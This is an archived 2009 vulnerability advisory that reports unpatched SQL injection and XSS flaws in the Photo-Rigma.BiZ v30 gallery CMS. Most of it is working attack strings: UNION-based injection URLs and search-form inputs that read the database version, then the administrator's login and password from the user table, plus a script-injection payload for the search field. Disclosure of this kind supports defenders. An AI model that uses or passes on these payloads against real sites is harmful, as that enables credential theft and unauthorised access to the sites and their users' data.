REMOTE SQL INJECTION (SQLi) VULNERABILITY--Photo-Rigma.BiZ v30-->

2009-04-24T00:00:00
ID SECURITYVULNS:DOC:21735
Type securityvulns
Reporter Securityvulns
Modified 2009-04-24T00:00:00

Description


REMOTE SQL INJECTION (SQLi) VULNERABILITY--Photo-Rigma.BiZ v30-->

CMS INFORMATION:

-->WEB: http://foto.rigma.biz (affected) -->DOWNLOAD: http://sourceforge.net/projects/photo-rigmabiz/ -->DEMO: http://foto.rigma.biz
-->CATEGORY: CMS / Portals -->DESCRIPTION: Photo gallery open source project.

-->RELEASED: 2009-04-24

CMS VULNERABILITY:

-->TESTED ON: firefox 3 -->DORK: N/A -->CATEGORY: SQL INJECTION (SQLi) / XSS -->AFFECT VERSION: V30 -->Discovered Bug date: 2009-04-24 -->Reported Bug date: 2009-04-24 -->Fixed bug date: Not fixed -->Info patch: Not fixed -->Author: YEnH4ckEr -->mail: y3nh4ck3r[at]gmail[dot]com -->WEB/BLOG: N/A -->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. -->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)

||||||||||||||||||||||||
||||||||||||||||||||||||

----|||| ||||---- ----|||| SQL INJECTION ||||---- ----|||| ||||---- |||||||||||||||||||||||| ||||||||||||||||||||||||

<<<<<<<<єєєєєєєєєєєєєє----------~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~----------єєєєєєєєєєєєєєє>>>>>>>> CONDITION: magic_quotes_gpc=off <<<<<<<<єєєєєєєєєєєєє---------~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~------------єєєєєєєєєєєєєєє>>>>>>>>

PROOF OF CONCEPT:

1.- Get var ::::: "uid":

http://[HOST]/[HOME_PATH]/?action=login&subact=profile&uid=1+AND+0+UNION+ALL+SELECT+1,2,3,version(),database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

2.- Search Post Form ::::: "poisk":

%' AND 0 UNION ALL SELECT 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#

~~~~~---->>Return: version and database.

EXPLOIT:

1.-

http://[HOST]/[HOME_PATH]/?action=login&subact=profile&uid=1+AND+0+UNION+ALL+SELECT+1,2,3,login,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+FROM+user+WHERE+id=1/*

2.-

%' AND 0 UNION ALL SELECT 1,2,3,concat(login,'<<::>>',password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 FROM user WHERE id=1#

~~~~~---->>Return: login and password for user id one (admin).

||||||||||||||||||||||||
||||||||||||||||||||||||

----|||| ||||---- ----|||| XSS (SEARCH) ||||---- ----|||| ||||---- |||||||||||||||||||||||| ||||||||||||||||||||||||

Search Post Form --> "><script>alert('y3nh4ck3r was here!')</script>

*************

ESPECIAL GREETZ TO: Str0ke, JosS, etc

*************

-------------------------------------------------------------------

*************

GREETZ TO: SPANISH H4ck3R COMMUNITY

*************